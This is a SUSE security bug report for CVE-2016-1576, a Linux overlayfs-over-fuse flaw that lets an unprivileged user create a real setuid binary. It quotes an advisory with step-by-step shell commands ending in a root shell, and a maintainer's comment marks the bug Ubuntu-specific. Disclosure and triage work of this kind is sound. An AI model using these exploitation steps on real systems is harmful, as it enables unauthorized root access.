Bug 968091 (CVE-2016-1576) - VUL-0: CVE-2016-1576: kernel: Overlayfs incorrectly copied up setuid binaries which allowed anunprivileged attacker to gain privi...
Summary: VUL-0: CVE-2016-1576: kernel: Overlayfs incorrectly copied up setuid binaries...
Status: RESOLVED INVALID
Alias: CVE-2016-1576
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: Goldwyn Rodrigues
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/162113/
Whiteboard: CVSSv2:NVD:CVE-2016-1576:7.2:(AV:L/A...
Keywords:
Depends on:
Blocks:
 
Reported: 2016-02-24 17:04 UTC by Alexander Bergmann
Modified: 2016-05-05 01:23 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Alexander Bergmann 2016-02-24 17:04:11 UTC 
http://seclists.org/oss-sec/2016/q1/418

[http://www.halfdog.net/Security/2016/OverlayfsOverFusePrivilegeEscalation/]

Introduction:
=============

* Problem description:

On Ubuntu Wily it is possible to place an USERNS overlayfs mount over
a fuse mount. The fuse filesystem may contain SUID binaries, but those
cannot be used to gain privileges due to nosuid mount options. But
when touching such an SUID binary via overlayfs mount, this will
trigger copy_up including all file attributes, thus creating a real
SUID binary on the disk.
Methods

Basic exploitation sequence is:

    Mount fuse filesystem exposing one world writable SUID binary
    Create USERNS
    Mount overlayfs on top of fuse
    Open the SUID binary RDWR in overlayfs, thus triggering copy_up

This can be archived, e.g.

test# mkdir fuse
test# mv SuidExec RealFile
test# ./FuseMinimal fuse
test# ./UserNamespaceExec -- /bin/bash
root# mkdir mnt upper work
root# mount -t overlayfs -o lowerdir=fuse,upperdir=upper,workdir=work
overlayfs mnt
root# touch mnt/file
touch: setting times of ‘mnt/file’: Permission denied
root# umount mnt
root# exit
test# fusermount -u fuse
test# ls -al upper/file
- -rwsr-xr-x 1 root root 9088 Jan 22 09:18 upper/file
test# upper/file /bin/bash
root# id
uid=0(root) gid=100(users) groups=100(users)


Results, Discussion:
====================

* Fixing the issue itself:

In my opinion, fuse filesystem allowed pretending to have files with
different UIDs/GIDs in the local mount namespace, but they never had
those properties, those files would have, when really stored on local
disk. So e.g., the SUID binaries lost their SUID-properties and the
owner could also modify arbitrary file content, even if file
attributes were pretending, that he does not have access - by having
control over the fuse process simulating the filesystem, such access
control is futile. That is also the reason, why no other user than the
one mounting the filesystem may have rights to access it by default.

Hence the workarounds should be to restrict access to fuse also only
to the mount namespace where it was created.

* Avoiding numerous namespace issues in future:

In my opinion, enabing USERNS was a little too fast, as it exposes a
lot of additional kernel code to users without any special
capabilities in init-ns by using the elevated privileges within the
container. This is also recognized by others, but there is dispute on
the consequences to draw from that. See Patch to disable unprivileged
userns ... on LKML [0].

I completely second the request to have options to disable the USERNS
layer as it depends on the system type, if USERNS is a net gain
regarding security or a net loss. It should be a gain on systems,
where it allows to perform critical operations within a containment, a
use-case where chroots are used currently. Without USERNS, those
operations are likely to be performed with SUID helpers in the init-ns
or privilege separation might be dropped completely as the overhead is
too large for efficient work procedures.

On the other hand, systems where all processes have similar security
level, e.g. as they all process the same data, further privilege
separation is not easy. The USERNS support will add only new risks here.

Timeline:
=========

* 20160117: Discovery, report at Launchpad [1]
* 20160121: First feedback from Ubuntu, Seth Arnold alreay working on
submitted but not yet accepted upstream patch
* 20160121: Feedback: first patch does not seem sufficient
* 20160122: Patch request to disable unprivileged userns due to this
and other issues LKML [0]
* 20160131: Bugfix by Seth Forshee available on Ubuntu Launchpad
* 20160117: CVE-2016-1576 linked on Launchpad [2]
* 20161122: CRD and publication


References:
===========

[0] https://lkml.org/lkml/2016/1/22/7
[1] https://bugs.launchpad.net/bugs/1535150
[2] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1576

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1576
http://seclists.org/oss-sec/2016/q1/418
http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-1576.html
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1576
https://bugs.launchpad.net/bugs/1535150
Comment 1 Swamp Workflow Management 2016-02-24 23:04:55 UTC 
bugbot adjusting priority
Comment 2 Goldwyn Rodrigues 2016-03-17 12:15:37 UTC 
We do not cater to usernamespace mount. We do not support FS_USERNS_MOUNT as a part of overlayfs which Ubuntu does. 

IOW, the step of mounting the overlayfs inside the username namespace (After ./UsernamespaceExec -- /bin/bash) will fail.

So this bug report is Ubuntu specific.